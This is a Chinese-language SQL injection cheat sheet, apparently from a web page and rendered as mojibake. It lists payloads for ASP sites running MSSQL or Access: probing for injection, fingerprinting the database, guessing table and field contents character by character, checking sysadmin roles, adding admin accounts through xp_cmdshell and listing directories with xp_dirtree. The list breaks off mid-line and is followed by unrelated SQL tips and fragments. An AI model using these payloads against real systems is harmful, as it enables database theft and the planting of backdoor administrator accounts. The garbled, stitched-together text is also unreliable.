SQLÊÖ¹¤×¢Èë´óÈ«
±È·½ËµÔÚ²éѯidÊÇ50µÄÊý¾Ýʱ£¬Èç¹ûÓû§´«½üÀ´µÄ²ÎÊýÊÇ50 and 1=1£¬Èç¹ûûÓÐÉèÖùýÂ˵Ļ°£¬¿ÉÒÔÖ±½Ó²é³öÀ´£¬SQL ×¢ÈëÒ»°ãÔÚASP³ÌÐòÖÐÓöµ½×î¶à£¬
¿´¿´ÏÂÃæµÄ
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.×¢Èë²ÎÊýÊÇ×Ö·û
'and [²éѯÌõ¼þ] and ''='
5.ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ
'and [²éѯÌõ¼þ] and '%25'='
6.²ÂÊý¾Ý¿â
;and (select Count(*) from [Êý¾Ý¿âÃû])>0
7.²Â×Ö¶Î
;and (select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
8.²Â×Ö¶ÎÖмǼ³¤¶È
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
9.(1)²Â×ֶεÄasciiÖµ£¨access£©
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
(2)²Â×ֶεÄasciiÖµ£¨mssql£©
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
10.²âÊÔȨÏ޽ṹ£¨mssql£©
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.Ìí¼ÓmssqlºÍϵͳµÄÕÊ»§
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)±éÀúĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('Éϲ½µÃµ½µÄpaths'))>)
(2)±éÀúĿ¼
;create table temp(id nvarchar(255),num1 nvar
Ïà¹ØÎĵµ£º
Sql´úÂë
--²ÉÓÃSQLÓï¾äʵÏÖsql2005ºÍExcel Êý¾ÝÖ®¼äµÄÊý¾Ýµ¼Èëµ¼³ö£¬ÔÚÍøÉÏÕÒÀ´Ò»--Ï£¬ÊµÏÖ·½·¨ÊÇÕâÑùµÄ£º
--Excel---->SQL2005 µ¼È룺
select * into useinfo from O ......
ÊìϤSQL SERVER 2000µÄÊý¾Ý¿â¹ÜÀíÔ±¶¼ÖªµÀ£¬ÆäDTS¿ÉÒÔ½øÐÐÊý¾ÝµÄµ¼Èëµ¼³ö£¬Æäʵ£¬ÎÒÃÇÒ²¿ÉÒÔʹÓÃTransact-SQLÓï¾ä½øÐе¼Èëµ¼³ö²Ù×÷¡£ÔÚTransact-SQLÓï¾äÖУ¬ÎÒÃÇÖ÷ҪʹÓÃOpenDataSourceº¯Êý¡¢OPENROWSET º¯Êý£¬¹ØÓÚº¯ÊýµÄÏêϸ˵Ã÷£¬Çë²Î¿¼SQLÁª»ú°ïÖú¡£ÀûÓÃÏÂÊö·½·¨£¬¿ÉÒÔÊ®·ÖÈÝÒ×µØʵÏÖSQL SERVER¡¢ACCESS¡¢EXCELÊý¾Ýת»»£ ......
select getdate()
ÊÇÏÔʾµ±Ç°ÏµÍ³Ê±¼ä£¬Êä³öµÄÈÕÆÚ¸ñʽÓë±¾»úÈÕÆÚ¸ñʽÓйأ¬¼ÙÈëÄãÏëÔÚʲôÇé¿ö϶¼ÏÔʾ³É2006-12-15 10:37:00ÕâÖÖÐÎʽÔòÐèҪת»»Ò»ÏÂ
select convert(varchar(30),getdate(),20)
ÏÔʾÊÇÐÇÆÚ¼¸µÄÓï¾äÊÇ
select datename(weekday,getdate())
ÈÕÆÚ¼ÓÐÇÆڵĻ°Ö±½Ó¼ÓÔÚÒ»¿é¾Í¿ÉÒÔÁË
select convert(varcha ......
ת×Ô£ºhttp://www.orafaq.com/wiki/SQL*Loader_FAQ#How_can_one_get_SQL.2ALoader_to_COMMIT_only_at_the_end_of_the_load_file.3F
Contents
[hide
]
1
What is SQL*Loader and what is it used for?
2
How does one use the SQL*Loader utility?
3
How does one load MS-Excel data into Oracle?
4
Is ther ......
н¨±í£º
create table [±íÃû]
(
[×Ô¶¯±àºÅ×Ö¶Î] int IDENTITY (1,1) PRIMARY KEY ,
[×Ö¶Î1] nVarChar(50) default 'ĬÈÏÖµ' null ,
[×Ö¶Î2] ntext null ,
[×Ö¶Î3] datetime,
[×Ö¶Î4] money null ,
[×Ö¶Î5] int default 0,
[×Ö¶Î6] Decimal (12,4) default 0,
[×Ö¶Î7] image null ,
)
ɾ³ý±í£º
Drop table [±í ......
